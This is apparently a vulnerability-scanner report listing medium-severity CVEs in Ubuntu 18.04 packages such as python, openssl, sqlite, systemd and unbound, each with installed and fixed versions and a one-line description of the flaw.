Medium CVE-2021-3520 liblz4-1 0.0~r131-2ubuntu3 0.0~r131-2ubuntu3.1 lz4: memory corruption due to an integer overflow bug caused by memmove argument liblz4-1:0.0~r131-2ubuntu3
Medium CVE-2022-1271 liblzma5 5.2.2-1.3 5.2.2-1.3ubuntu0.1 gzip: arbitrary-file-write vulnerability liblzma5:5.2.2-1.3
Medium CVE-2019-18218 libmagic-mgc 1:5.32-2ubuntu0.1 1:5.32-2ubuntu0.3 file: heap-based buffer overflow in cdf_read_property_info in cdf.c libmagic-mgc:1:5.32-2ubuntu0.1
Medium CVE-2019-8906 libmagic-mgc 1:5.32-2ubuntu0.1 1:5.32-2ubuntu0.2 file: out-of-bounds read in do_core_note in readelf.c libmagic-mgc:1:5.32-2ubuntu0.1
Medium CVE-2019-8907 libmagic-mgc 1:5.32-2ubuntu0.1 1:5.32-2ubuntu0.2 file: do_core_note in readelf.c allows remote attackers to cause a denial of service libmagic-mgc:1:5.32-2ubuntu0.1
Medium CVE-2019-18218 libmagic1 1:5.32-2ubuntu0.1 1:5.32-2ubuntu0.3 file: heap-based buffer overflow in cdf_read_property_info in cdf.c libmagic1:1:5.32-2ubuntu0.1
Medium CVE-2019-8906 libmagic1 1:5.32-2ubuntu0.1 1:5.32-2ubuntu0.2 file: out-of-bounds read in do_core_note in readelf.c libmagic1:1:5.32-2ubuntu0.1
Medium CVE-2019-8907 libmagic1 1:5.32-2ubuntu0.1 1:5.32-2ubuntu0.2 file: do_core_note in readelf.c allows remote attackers to cause a denial of service libmagic1:1:5.32-2ubuntu0.1
Medium CVE-2021-20305 libnettle6 3.4-1 3.4-1ubuntu0.1 nettle: Out of bounds memory access in signature verification libnettle6:3.4-1
Medium CVE-2021-3580 libnettle6 3.4-1 3.4.1-0ubuntu0.18.04.1 nettle: Remote crash in RSA decryption via manipulated ciphertext libnettle6:3.4-1
Medium CVE-2020-29361 libp11-kit-dev 0.23.9-2 0.23.9-2ubuntu0.1 p11-kit: integer overflow when allocating memory for arrays or attributes and object identifiers libp11-kit-dev:0.23.9-2
Medium CVE-2020-29362 libp11-kit-dev 0.23.9-2 0.23.9-2ubuntu0.1 p11-kit: out-of-bounds read in p11_rpc_buffer_get_byte_array function in rpc-message.c libp11-kit-dev:0.23.9-2
Medium CVE-2020-29363 libp11-kit-dev 0.23.9-2 0.23.9-2ubuntu0.1 p11-kit: out-of-bounds write in p11_rpc_buffer_get_byte_array_value function in rpc-message.c libp11-kit-dev:0.23.9-2
Medium CVE-2020-29361 libp11-kit0 0.23.9-2 0.23.9-2ubuntu0.1 p11-kit: integer overflow when allocating memory for arrays or attributes and object identifiers libp11-kit0:0.23.9-2
Medium CVE-2020-29362 libp11-kit0 0.23.9-2 0.23.9-2ubuntu0.1 p11-kit: out-of-bounds read in p11_rpc_buffer_get_byte_array function in rpc-message.c libp11-kit0:0.23.9-2
Medium CVE-2020-29363 libp11-kit0 0.23.9-2 0.23.9-2ubuntu0.1 p11-kit: out-of-bounds write in p11_rpc_buffer_get_byte_array_value function in rpc-message.c libp11-kit0:0.23.9-2
Medium CVE-2018-18311 libperl5.26 5.26.1-6ubuntu0.1 5.26.1-6ubuntu0.3 perl: Integer overflow leading to buffer overflow in Perl_my_setenv() libperl5.26:5.26.1-6ubuntu0.1
Medium CVE-2018-18312 libperl5.26 5.26.1-6ubuntu0.1 5.26.1-6ubuntu0.3 perl: Heap-based buffer overflow in S_handle_regex_sets() libperl5.26:5.26.1-6ubuntu0.1
Medium CVE-2018-18313 libperl5.26 5.26.1-6ubuntu0.1 5.26.1-6ubuntu0.3 perl: Heap-based buffer read overflow in S_grok_bslash_N() libperl5.26:5.26.1-6ubuntu0.1
Medium CVE-2018-18314 libperl5.26 5.26.1-6ubuntu0.1 5.26.1-6ubuntu0.3 perl: Heap-based buffer overflow in S_regatom() libperl5.26:5.26.1-6ubuntu0.1
Medium CVE-2018-1000802 libpython2.7-minimal 2.7.15~rc1-1 2.7.15~rc1-1ubuntu0.1 python: Command injection in the shutil module libpython2.7-minimal:2.7.15~rc1-1
Medium CVE-2018-14647 libpython2.7-minimal 2.7.15~rc1-1 2.7.15~rc1-1ubuntu0.1 python: Missing salt initialization in _elementtree.c module libpython2.7-minimal:2.7.15~rc1-1
Medium CVE-2018-20852 libpython2.7-minimal 2.7.15~rc1-1 2.7.15-4ubuntu4~18.04.1 python: Cookie domain check returns incorrect results libpython2.7-minimal:2.7.15~rc1-1
Medium CVE-2019-10160 libpython2.7-minimal 2.7.15~rc1-1 2.7.15-4ubuntu4~18.04.1 python: regression of CVE-2019-9636 due to functional fix to allow port numbers in netloc libpython2.7-minimal:2.7.15~rc1-1
Medium CVE-2019-16056 libpython2.7-minimal 2.7.15~rc1-1 2.7.15-4ubuntu4~18.04.2 python: email.utils.parseaddr wrongly parses email addresses libpython2.7-minimal:2.7.15~rc1-1
Medium CVE-2019-18348 libpython2.7-minimal 2.7.15~rc1-1 2.7.17-1~18.04ubuntu1 python: CRLF injection via the host part of the url passed to urlopen() libpython2.7-minimal:2.7.15~rc1-1
Medium CVE-2019-20907 libpython2.7-minimal 2.7.15~rc1-1 2.7.17-1~18.04ubuntu1.1 python: infinite loop in the tarfile module via crafted TAR archive libpython2.7-minimal:2.7.15~rc1-1
Medium CVE-2019-9636 libpython2.7-minimal 2.7.15~rc1-1 2.7.15-4ubuntu4~18.04.1 python: Information Disclosure due to urlsplit improper NFKC normalization libpython2.7-minimal:2.7.15~rc1-1
Medium CVE-2019-9740 libpython2.7-minimal 2.7.15~rc1-1 2.7.15-4ubuntu4~18.04.1 python: CRLF injection via the query part of the url passed to urlopen() libpython2.7-minimal:2.7.15~rc1-1
Medium CVE-2019-9947 libpython2.7-minimal 2.7.15~rc1-1 2.7.15-4ubuntu4~18.04.1 python: CRLF injection via the path part of the url passed to urlopen() libpython2.7-minimal:2.7.15~rc1-1
Medium CVE-2019-9948 libpython2.7-minimal 2.7.15~rc1-1 2.7.15-4ubuntu4~18.04.1 python: Undocumented local_file protocol allows remote attackers to bypass protection mechanisms libpython2.7-minimal:2.7.15~rc1-1
Medium CVE-2020-26116 libpython2.7-minimal 2.7.15~rc1-1 2.7.17-1~18.04ubuntu1.2 python: CRLF injection via HTTP request method in httplib/http.client libpython2.7-minimal:2.7.15~rc1-1
Medium CVE-2021-3177 libpython2.7-minimal 2.7.15~rc1-1 2.7.17-1~18.04ubuntu1.6 python: Stack-based buffer overflow in PyCArg_repr in _ctypes/callproc.c libpython2.7-minimal:2.7.15~rc1-1
Medium CVE-2021-4189 libpython2.7-minimal 2.7.15~rc1-1 2.7.17-1~18.04ubuntu1.7 python: ftplib should not use the host from the PASV response libpython2.7-minimal:2.7.15~rc1-1
Medium CVE-2022-0391 libpython2.7-minimal 2.7.15~rc1-1 2.7.17-1~18.04ubuntu1.7 python: urllib.parse does not sanitize URLs containing ASCII newline and tabs libpython2.7-minimal:2.7.15~rc1-1
Medium CVE-2018-1000802 libpython2.7-stdlib 2.7.15~rc1-1 2.7.15~rc1-1ubuntu0.1 python: Command injection in the shutil module libpython2.7-stdlib:2.7.15~rc1-1
Medium CVE-2018-14647 libpython2.7-stdlib 2.7.15~rc1-1 2.7.15~rc1-1ubuntu0.1 python: Missing salt initialization in _elementtree.c module libpython2.7-stdlib:2.7.15~rc1-1
Medium CVE-2018-20852 libpython2.7-stdlib 2.7.15~rc1-1 2.7.15-4ubuntu4~18.04.1 python: Cookie domain check returns incorrect results libpython2.7-stdlib:2.7.15~rc1-1
Medium CVE-2019-10160 libpython2.7-stdlib 2.7.15~rc1-1 2.7.15-4ubuntu4~18.04.1 python: regression of CVE-2019-9636 due to functional fix to allow port numbers in netloc libpython2.7-stdlib:2.7.15~rc1-1
Medium CVE-2019-16056 libpython2.7-stdlib 2.7.15~rc1-1 2.7.15-4ubuntu4~18.04.2 python: email.utils.parseaddr wrongly parses email addresses libpython2.7-stdlib:2.7.15~rc1-1
Medium CVE-2019-18348 libpython2.7-stdlib 2.7.15~rc1-1 2.7.17-1~18.04ubuntu1 python: CRLF injection via the host part of the url passed to urlopen() libpython2.7-stdlib:2.7.15~rc1-1
Medium CVE-2019-20907 libpython2.7-stdlib 2.7.15~rc1-1 2.7.17-1~18.04ubuntu1.1 python: infinite loop in the tarfile module via crafted TAR archive libpython2.7-stdlib:2.7.15~rc1-1
Medium CVE-2019-9636 libpython2.7-stdlib 2.7.15~rc1-1 2.7.15-4ubuntu4~18.04.1 python: Information Disclosure due to urlsplit improper NFKC normalization libpython2.7-stdlib:2.7.15~rc1-1
Medium CVE-2019-9740 libpython2.7-stdlib 2.7.15~rc1-1 2.7.15-4ubuntu4~18.04.1 python: CRLF injection via the query part of the url passed to urlopen() libpython2.7-stdlib:2.7.15~rc1-1
Medium CVE-2019-9947 libpython2.7-stdlib 2.7.15~rc1-1 2.7.15-4ubuntu4~18.04.1 python: CRLF injection via the path part of the url passed to urlopen() libpython2.7-stdlib:2.7.15~rc1-1
Medium CVE-2019-9948 libpython2.7-stdlib 2.7.15~rc1-1 2.7.15-4ubuntu4~18.04.1 python: Undocumented local_file protocol allows remote attackers to bypass protection mechanisms libpython2.7-stdlib:2.7.15~rc1-1
Medium CVE-2020-26116 libpython2.7-stdlib 2.7.15~rc1-1 2.7.17-1~18.04ubuntu1.2 python: CRLF injection via HTTP request method in httplib/http.client libpython2.7-stdlib:2.7.15~rc1-1
Medium CVE-2021-3177 libpython2.7-stdlib 2.7.15~rc1-1 2.7.17-1~18.04ubuntu1.6 python: Stack-based buffer overflow in PyCArg_repr in _ctypes/callproc.c libpython2.7-stdlib:2.7.15~rc1-1
Medium CVE-2021-4189 libpython2.7-stdlib 2.7.15~rc1-1 2.7.17-1~18.04ubuntu1.7 python: ftplib should not use the host from the PASV response libpython2.7-stdlib:2.7.15~rc1-1
Medium CVE-2022-0391 libpython2.7-stdlib 2.7.15~rc1-1 2.7.17-1~18.04ubuntu1.7 python: urllib.parse does not sanitize URLs containing ASCII newline and tabs libpython2.7-stdlib:2.7.15~rc1-1
Medium CVE-2018-14647 libpython3.6-minimal 3.6.5-3 3.6.7-1~18.04 python: Missing salt initialization in _elementtree.c module libpython3.6-minimal:3.6.5-3
Medium CVE-2018-20852 libpython3.6-minimal 3.6.5-3 3.6.8-1~18.04.2 python: Cookie domain check returns incorrect results libpython3.6-minimal:3.6.5-3
Medium CVE-2019-10160 libpython3.6-minimal 3.6.5-3 3.6.8-1~18.04.2 python: regression of CVE-2019-9636 due to functional fix to allow port numbers in netloc libpython3.6-minimal:3.6.5-3
Medium CVE-2019-16056 libpython3.6-minimal 3.6.5-3 3.6.8-1~18.04.3 python: email.utils.parseaddr wrongly parses email addresses libpython3.6-minimal:3.6.5-3
Medium CVE-2019-18348 libpython3.6-minimal 3.6.5-3 3.6.9-1~18.04ubuntu1 python: CRLF injection via the host part of the url passed to urlopen() libpython3.6-minimal:3.6.5-3
Medium CVE-2019-20907 libpython3.6-minimal 3.6.5-3 3.6.9-1~18.04ubuntu1.1 python: infinite loop in the tarfile module via crafted TAR archive libpython3.6-minimal:3.6.5-3
Medium CVE-2019-9636 libpython3.6-minimal 3.6.5-3 3.6.8-1~18.04.2 python: Information Disclosure due to urlsplit improper NFKC normalization libpython3.6-minimal:3.6.5-3
Medium CVE-2019-9740 libpython3.6-minimal 3.6.5-3 3.6.8-1~18.04.2 python: CRLF injection via the query part of the url passed to urlopen() libpython3.6-minimal:3.6.5-3
Medium CVE-2019-9947 libpython3.6-minimal 3.6.5-3 3.6.8-1~18.04.2 python: CRLF injection via the path part of the url passed to urlopen() libpython3.6-minimal:3.6.5-3
Medium CVE-2019-9948 libpython3.6-minimal 3.6.5-3 3.6.8-1~18.04.2 python: Undocumented local_file protocol allows remote attackers to bypass protection mechanisms libpython3.6-minimal:3.6.5-3
Medium CVE-2020-26116 libpython3.6-minimal 3.6.5-3 3.6.9-1~18.04ubuntu1.3 python: CRLF injection via HTTP request method in httplib/http.client libpython3.6-minimal:3.6.5-3
Medium CVE-2021-3177 libpython3.6-minimal 3.6.5-3 3.6.9-1~18.04ubuntu1.4 python: Stack-based buffer overflow in PyCArg_repr in _ctypes/callproc.c libpython3.6-minimal:3.6.5-3
Medium CVE-2021-3733 libpython3.6-minimal 3.6.5-3 3.6.9-1~18.04ubuntu1.6 python: urllib: Regular expression DoS in AbstractBasicAuthHandler libpython3.6-minimal:3.6.5-3
Medium CVE-2021-3737 libpython3.6-minimal 3.6.5-3 3.6.9-1~18.04ubuntu1.6 python: urllib: HTTP client possible infinite loop on a 100 Continue response libpython3.6-minimal:3.6.5-3
Medium CVE-2021-4189 libpython3.6-minimal 3.6.5-3 3.6.9-1~18.04ubuntu1.7 python: ftplib should not use the host from the PASV response libpython3.6-minimal:3.6.5-3
Medium CVE-2022-0391 libpython3.6-minimal 3.6.5-3 3.6.9-1~18.04ubuntu1.7 python: urllib.parse does not sanitize URLs containing ASCII newline and tabs libpython3.6-minimal:3.6.5-3
Medium CVE-2018-14647 libpython3.6-stdlib 3.6.5-3 3.6.7-1~18.04 python: Missing salt initialization in _elementtree.c module libpython3.6-stdlib:3.6.5-3
Medium CVE-2018-20852 libpython3.6-stdlib 3.6.5-3 3.6.8-1~18.04.2 python: Cookie domain check returns incorrect results libpython3.6-stdlib:3.6.5-3
Medium CVE-2019-10160 libpython3.6-stdlib 3.6.5-3 3.6.8-1~18.04.2 python: regression of CVE-2019-9636 due to functional fix to allow port numbers in netloc libpython3.6-stdlib:3.6.5-3
Medium CVE-2019-16056 libpython3.6-stdlib 3.6.5-3 3.6.8-1~18.04.3 python: email.utils.parseaddr wrongly parses email addresses libpython3.6-stdlib:3.6.5-3
Medium CVE-2019-18348 libpython3.6-stdlib 3.6.5-3 3.6.9-1~18.04ubuntu1 python: CRLF injection via the host part of the url passed to urlopen() libpython3.6-stdlib:3.6.5-3
Medium CVE-2019-20907 libpython3.6-stdlib 3.6.5-3 3.6.9-1~18.04ubuntu1.1 python: infinite loop in the tarfile module via crafted TAR archive libpython3.6-stdlib:3.6.5-3
Medium CVE-2019-9636 libpython3.6-stdlib 3.6.5-3 3.6.8-1~18.04.2 python: Information Disclosure due to urlsplit improper NFKC normalization libpython3.6-stdlib:3.6.5-3
Medium CVE-2019-9740 libpython3.6-stdlib 3.6.5-3 3.6.8-1~18.04.2 python: CRLF injection via the query part of the url passed to urlopen() libpython3.6-stdlib:3.6.5-3
Medium CVE-2019-9947 libpython3.6-stdlib 3.6.5-3 3.6.8-1~18.04.2 python: CRLF injection via the path part of the url passed to urlopen() libpython3.6-stdlib:3.6.5-3
Medium CVE-2019-9948 libpython3.6-stdlib 3.6.5-3 3.6.8-1~18.04.2 python: Undocumented local_file protocol allows remote attackers to bypass protection mechanisms libpython3.6-stdlib:3.6.5-3
Medium CVE-2020-26116 libpython3.6-stdlib 3.6.5-3 3.6.9-1~18.04ubuntu1.3 python: CRLF injection via HTTP request method in httplib/http.client libpython3.6-stdlib:3.6.5-3
Medium CVE-2021-3177 libpython3.6-stdlib 3.6.5-3 3.6.9-1~18.04ubuntu1.4 python: Stack-based buffer overflow in PyCArg_repr in _ctypes/callproc.c libpython3.6-stdlib:3.6.5-3
Medium CVE-2021-3733 libpython3.6-stdlib 3.6.5-3 3.6.9-1~18.04ubuntu1.6 python: urllib: Regular expression DoS in AbstractBasicAuthHandler libpython3.6-stdlib:3.6.5-3
Medium CVE-2021-3737 libpython3.6-stdlib 3.6.5-3 3.6.9-1~18.04ubuntu1.6 python: urllib: HTTP client possible infinite loop on a 100 Continue response libpython3.6-stdlib:3.6.5-3
Medium CVE-2021-4189 libpython3.6-stdlib 3.6.5-3 3.6.9-1~18.04ubuntu1.7 python: ftplib should not use the host from the PASV response libpython3.6-stdlib:3.6.5-3
Medium CVE-2022-0391 libpython3.6-stdlib 3.6.5-3 3.6.9-1~18.04ubuntu1.7 python: urllib.parse does not sanitize URLs containing ASCII newline and tabs libpython3.6-stdlib:3.6.5-3
Medium CVE-2019-19906 libsasl2-2 2.1.27~101-g0780600+dfsg-3ubuntu2 2.1.27~101-g0780600+dfsg-3ubuntu2.1 cyrus-sasl: denial of service in _sasl_add_string function libsasl2-2:2.1.27~101-g0780600+dfsg-3ubuntu2
Medium CVE-2019-19906 libsasl2-modules 2.1.27~101-g0780600+dfsg-3ubuntu2 2.1.27~101-g0780600+dfsg-3ubuntu2.1 cyrus-sasl: denial of service in _sasl_add_string function libsasl2-modules:2.1.27~101-g0780600+dfsg-3ubuntu2
Medium CVE-2019-19906 libsasl2-modules-db 2.1.27~101-g0780600+dfsg-3ubuntu2 2.1.27~101-g0780600+dfsg-3ubuntu2.1 cyrus-sasl: denial of service in _sasl_add_string function libsasl2-modules-db:2.1.27~101-g0780600+dfsg-3ubuntu2
Medium CVE-2019-9893 libseccomp2 2.3.1-2.1ubuntu4 2.4.1-0ubuntu0.18.04.2 libseccomp: incorrect generation of syscall filters in libseccomp libseccomp2:2.3.1-2.1ubuntu4
Medium CVE-2018-20346 libsqlite3-0 3.22.0-1 3.22.0-1ubuntu0.1 CVE-2018-20505 CVE-2018-20506 sqlite: Multiple flaws in sqlite which can be triggered via corrupted internal databases (Magellan) libsqlite3-0:3.22.0-1
Medium CVE-2018-20506 libsqlite3-0 3.22.0-1 3.22.0-1ubuntu0.1 CVE-2018-20346 CVE-2018-20505 CVE-2018-20506 sqlite: Multiple flaws in sqlite which can be triggered via corrupted internal databases (Magellan) libsqlite3-0:3.22.0-1
Medium CVE-2019-13734 libsqlite3-0 3.22.0-1 3.22.0-1ubuntu0.3 sqlite: fts3: improve shadow table corruption detection libsqlite3-0:3.22.0-1
Medium CVE-2019-13750 libsqlite3-0 3.22.0-1 3.22.0-1ubuntu0.3 sqlite: dropping of shadow tables not restricted in defensive mode libsqlite3-0:3.22.0-1
Medium CVE-2019-13751 libsqlite3-0 3.22.0-1 3.22.0-1ubuntu0.3 sqlite: fts3: improve detection of corrupted records libsqlite3-0:3.22.0-1
Medium CVE-2019-13752 libsqlite3-0 3.22.0-1 3.22.0-1ubuntu0.3 sqlite: fts3: improve shadow table corruption detection libsqlite3-0:3.22.0-1
Medium CVE-2019-13753 libsqlite3-0 3.22.0-1 3.22.0-1ubuntu0.3 sqlite: fts3: incorrectly removed corruption check libsqlite3-0:3.22.0-1
Medium CVE-2019-19923 libsqlite3-0 3.22.0-1 3.22.0-1ubuntu0.3 sqlite: mishandling of certain uses of SELECT DISTINCT involving a LEFT JOIN in flattenSubquery in select.c leads to a NULL pointer dereference libsqlite3-0:3.22.0-1
Medium CVE-2019-19925 libsqlite3-0 3.22.0-1 3.22.0-1ubuntu0.3 sqlite: zipfileUpdate in ext/misc/zipfile.c mishandles a NULL pathname during an update of a ZIP archive libsqlite3-0:3.22.0-1
Medium CVE-2019-19926 libsqlite3-0 3.22.0-1 3.22.0-1ubuntu0.3 sqlite: error mishandling because of incomplete fix of CVE-2019-19880 libsqlite3-0:3.22.0-1
Medium CVE-2019-19959 libsqlite3-0 3.22.0-1 3.22.0-1ubuntu0.3 sqlite: mishandles certain uses of INSERT INTO in situations involving embedded '\0' characters in filenames libsqlite3-0:3.22.0-1
Medium CVE-2019-8457 libsqlite3-0 3.22.0-1 3.22.0-1ubuntu0.1 sqlite: heap out-of-bound read in function rtreenode() libsqlite3-0:3.22.0-1
Medium CVE-2019-9936 libsqlite3-0 3.22.0-1 3.22.0-1ubuntu0.1 sqlite: heap-based buffer over-read in function fts5HashEntrySort in sqlite3.c libsqlite3-0:3.22.0-1
Medium CVE-2020-13434 libsqlite3-0 3.22.0-1 3.22.0-1ubuntu0.4 sqlite: integer overflow in sqlite3_str_vappendf function in printf.c libsqlite3-0:3.22.0-1
Medium CVE-2020-13630 libsqlite3-0 3.22.0-1 3.22.0-1ubuntu0.4 sqlite: Use-after-free in fts3EvalNextRow in ext/fts3/fts3.c libsqlite3-0:3.22.0-1
Medium CVE-2020-13632 libsqlite3-0 3.22.0-1 3.22.0-1ubuntu0.4 sqlite: NULL pointer dereference in ext/fts3/fts3_snippet.c via a crafted matchinfo() query libsqlite3-0:3.22.0-1
Medium CVE-2020-9327 libsqlite3-0 3.22.0-1 3.22.0-1ubuntu0.3 sqlite: NULL pointer dereference and segmentation fault because of generated column optimizations libsqlite3-0:3.22.0-1
Medium CVE-2019-5094 libss2 1.44.1-1 1.44.1-1ubuntu1.2 e2fsprogs: Crafted ext4 partition leads to out-of-bounds write libss2:1.44.1-1
Medium CVE-2019-5188 libss2 1.44.1-1 1.44.1-1ubuntu1.3 e2fsprogs: Out-of-bounds write in e2fsck/rehash.c libss2:1.44.1-1
Medium CVE-2022-1304 libss2 1.44.1-1 1.44.1-1ubuntu1.4 e2fsprogs: out-of-bounds read/write via crafted filesystem libss2:1.44.1-1
Medium CVE-2019-1559 libssl1.0.0 1.0.2n-1ubuntu5.1 1.0.2n-1ubuntu5.3 openssl: 0-byte record padding oracle libssl1.0.0:1.0.2n-1ubuntu5.1
Medium CVE-2021-23841 libssl1.0.0 1.0.2n-1ubuntu5.1 1.0.2n-1ubuntu5.6 openssl: NULL pointer dereference in X509_issuer_and_serial_hash() libssl1.0.0:1.0.2n-1ubuntu5.1
Medium CVE-2021-3712 libssl1.0.0 1.0.2n-1ubuntu5.1 1.0.2n-1ubuntu5.7 openssl: Read buffer overruns processing ASN.1 strings libssl1.0.0:1.0.2n-1ubuntu5.1
Medium CVE-2022-1292 libssl1.0.0 1.0.2n-1ubuntu5.1 1.0.2n-1ubuntu5.9 openssl: c_rehash script allows command injection libssl1.0.0:1.0.2n-1ubuntu5.1
Medium CVE-2022-2068 libssl1.0.0 1.0.2n-1ubuntu5.1 1.0.2n-1ubuntu5.10 openssl: the c_rehash script allows command injection libssl1.0.0:1.0.2n-1ubuntu5.1
Medium CVE-2021-23841 libssl1.1 1.1.0g-2ubuntu4.1 1.1.1-1ubuntu2.1~18.04.8 openssl: NULL pointer dereference in X509_issuer_and_serial_hash() libssl1.1:1.1.0g-2ubuntu4.1
Medium CVE-2021-3712 libssl1.1 1.1.0g-2ubuntu4.1 1.1.1-1ubuntu2.1~18.04.13 openssl: Read buffer overruns processing ASN.1 strings libssl1.1:1.1.0g-2ubuntu4.1
Medium CVE-2022-1292 libssl1.1 1.1.0g-2ubuntu4.1 1.1.1-1ubuntu2.1~18.04.17 openssl: c_rehash script allows command injection libssl1.1:1.1.0g-2ubuntu4.1
Medium CVE-2022-2068 libssl1.1 1.1.0g-2ubuntu4.1 1.1.1-1ubuntu2.1~18.04.19 openssl: the c_rehash script allows command injection libssl1.1:1.1.0g-2ubuntu4.1
Medium CVE-2022-2097 libssl1.1 1.1.0g-2ubuntu4.1 1.1.1-1ubuntu2.1~18.04.20 openssl: AES OCB fails to encrypt some bytes libssl1.1:1.1.0g-2ubuntu4.1
Medium CVE-2018-15686 libsystemd0 237-3ubuntu10 237-3ubuntu10.6 systemd: line splitting via fgets() allows for state injection during daemon-reexec libsystemd0:237-3ubuntu10
Medium CVE-2018-15687 libsystemd0 237-3ubuntu10 237-3ubuntu10.6 systemd: Dereference of symlinks in chown_recursive.c:chown_one() allows for modification of file privileges libsystemd0:237-3ubuntu10
Medium CVE-2018-15688 libsystemd0 237-3ubuntu10 237-3ubuntu10.4 systemd: Out-of-bounds heap write in systemd-networkd dhcpv6 option handling libsystemd0:237-3ubuntu10
Medium CVE-2018-16866 libsystemd0 237-3ubuntu10 237-3ubuntu10.11 systemd: out-of-bounds read when parsing a crafted syslog message libsystemd0:237-3ubuntu10
Medium CVE-2018-6954 libsystemd0 237-3ubuntu10 237-3ubuntu10.9 systemd: Mishandled symlinks in systemd-tmpfiles allows local users to obtain ownership of arbitrary files libsystemd0:237-3ubuntu10
Medium CVE-2019-15718 libsystemd0 237-3ubuntu10 237-3ubuntu10.28 systemd: systemd-resolved allows unprivileged users to configure DNS libsystemd0:237-3ubuntu10
Medium CVE-2019-3842 libsystemd0 237-3ubuntu10 237-3ubuntu10.19 systemd: Spoofing of XDG_SEAT allows for actions to be checked against "allow_active" instead of "allow_any" libsystemd0:237-3ubuntu10
Medium CVE-2019-6454 libsystemd0 237-3ubuntu10 237-3ubuntu10.13 systemd: Insufficient input validation in bus_process_object() resulting in PID 1 crash libsystemd0:237-3ubuntu10
Medium CVE-2020-1712 libsystemd0 237-3ubuntu10 237-3ubuntu10.38 systemd: use-after-free when asynchronous polkit queries are performed libsystemd0:237-3ubuntu10
Medium CVE-2018-15686 libudev1 237-3ubuntu10 237-3ubuntu10.6 systemd: line splitting via fgets() allows for state injection during daemon-reexec libudev1:237-3ubuntu10
Medium CVE-2018-15687 libudev1 237-3ubuntu10 237-3ubuntu10.6 systemd: Dereference of symlinks in chown_recursive.c:chown_one() allows for modification of file privileges libudev1:237-3ubuntu10
Medium CVE-2018-15688 libudev1 237-3ubuntu10 237-3ubuntu10.4 systemd: Out-of-bounds heap write in systemd-networkd dhcpv6 option handling libudev1:237-3ubuntu10
Medium CVE-2018-16866 libudev1 237-3ubuntu10 237-3ubuntu10.11 systemd: out-of-bounds read when parsing a crafted syslog message libudev1:237-3ubuntu10
Medium CVE-2018-6954 libudev1 237-3ubuntu10 237-3ubuntu10.9 systemd: Mishandled symlinks in systemd-tmpfiles allows local users to obtain ownership of arbitrary files libudev1:237-3ubuntu10
Medium CVE-2019-15718 libudev1 237-3ubuntu10 237-3ubuntu10.28 systemd: systemd-resolved allows unprivileged users to configure DNS libudev1:237-3ubuntu10
Medium CVE-2019-3842 libudev1 237-3ubuntu10 237-3ubuntu10.19 systemd: Spoofing of XDG_SEAT allows for actions to be checked against "allow_active" instead of "allow_any" libudev1:237-3ubuntu10
Medium CVE-2019-6454 libudev1 237-3ubuntu10 237-3ubuntu10.13 systemd: Insufficient input validation in bus_process_object() resulting in PID 1 crash libudev1:237-3ubuntu10
Medium CVE-2020-1712 libudev1 237-3ubuntu10 237-3ubuntu10.38 systemd: use-after-free when asynchronous polkit queries are performed libudev1:237-3ubuntu10
Medium CVE-2019-25031 libunbound2 1.6.7-1ubuntu2.1 1.6.7-1ubuntu2.4 unbound: configuration injection in create_unbound_ad_servers.sh upon a successful man-in-the-middle attack against a cleartext HTTP session libunbound2:1.6.7-1ubuntu2.1
Medium CVE-2019-25032 libunbound2 1.6.7-1ubuntu2.1 1.6.7-1ubuntu2.4 unbound: integer overflow in the regional allocator via regional_alloc libunbound2:1.6.7-1ubuntu2.1
Medium CVE-2019-25033 libunbound2 1.6.7-1ubuntu2.1 1.6.7-1ubuntu2.4 unbound: integer overflow in the regional allocator via the ALIGN_UP macro libunbound2:1.6.7-1ubuntu2.1
Medium CVE-2019-25034 libunbound2 1.6.7-1ubuntu2.1 1.6.7-1ubuntu2.4 unbound: integer overflow in sldns_str2wire_dname_buf_origin can lead to an out-of-bounds write libunbound2:1.6.7-1ubuntu2.1
Medium CVE-2019-25035 libunbound2 1.6.7-1ubuntu2.1 1.6.7-1ubuntu2.4 unbound: out-of-bounds write in sldns_bget_token_par libunbound2:1.6.7-1ubuntu2.1
Medium CVE-2019-25036 libunbound2 1.6.7-1ubuntu2.1 1.6.7-1ubuntu2.4 unbound: assertion failure and denial of service in synth_cname libunbound2:1.6.7-1ubuntu2.1
Medium CVE-2019-25037 libunbound2 1.6.7-1ubuntu2.1 1.6.7-1ubuntu2.4 unbound: assertion failure and denial of service in dname_pkt_copy via an invalid packet libunbound2:1.6.7-1ubuntu2.1
Medium CVE-2019-25038 libunbound2 1.6.7-1ubuntu2.1 1.6.7-1ubuntu2.4 unbound: integer overflow in a size calculation in dnscrypt/dnscrypt.c libunbound2:1.6.7-1ubuntu2.1
Medium CVE-2019-25039 libunbound2 1.6.7-1ubuntu2.1 1.6.7-1ubuntu2.4 unbound: integer overflow in a size calculation in respip/respip.c libunbound2:1.6.7-1ubuntu2.1
Medium CVE-2019-25040 libunbound2 1.6.7-1ubuntu2.1 1.6.7-1ubuntu2.4 unbound: infinite loop via a compressed name in dname_pkt_copy libunbound2:1.6.7-1ubuntu2.1
Medium CVE-2019-25041 libunbound2 1.6.7-1ubuntu2.1 1.6.7-1ubuntu2.4 unbound: assertion failure via a compressed name in dname_pkt_copy libunbound2:1.6.7-1ubuntu2.1
Medium CVE-2019-25042 libunbound2 1.6.7-1ubuntu2.1 1.6.7-1ubuntu2.4 unbound: out-of-bounds write via a compressed name in rdata_copy libunbound2:1.6.7-1ubuntu2.1
Medium CVE-2020-12662 libunbound2 1.6.7-1ubuntu2.1 1.6.7-1ubuntu2.3 unbound: amplification of an incoming query into a large number of queries directed to a target libunbound2:1.6.7-1ubuntu2.1
Medium CVE-2018-14598 libx11-6 2:1.6.4-3 2:1.6.4-3ubuntu0.1 libX11: Crash on invalid reply in XListExtensions in ListExt.c libx11-6:2:1.6.4-3
Medium CVE-2018-14599 libx11-6 2:1.6.4-3 2:1.6.4-3ubuntu0.1 libX11: Off-by-one error in XListExtensions in ListExt.c libx11-6:2:1.6.4-3
Medium CVE-2018-14600 libx11-6 2:1.6.4-3 2:1.6.4-3ubuntu0.1 libX11: Out of Bounds write in XListExtensions in ListExt.c libx11-6:2:1.6.4-3
Medium CVE-2020-14344 libx11-6 2:1.6.4-3 2:1.6.4-3ubuntu0.3 libX11: Heap overflow in the X input method client libx11-6:2:1.6.4-3
Medium CVE-2020-14363 libx11-6 2:1.6.4-3 2:1.6.4-3ubuntu0.3 libX11: integer overflow leads to double free in locale handling libx11-6:2:1.6.4-3
Medium CVE-2021-31535 libx11-6 2:1.6.4-3 2:1.6.4-3ubuntu0.4 libX11: missing request length checks libx11-6:2:1.6.4-3
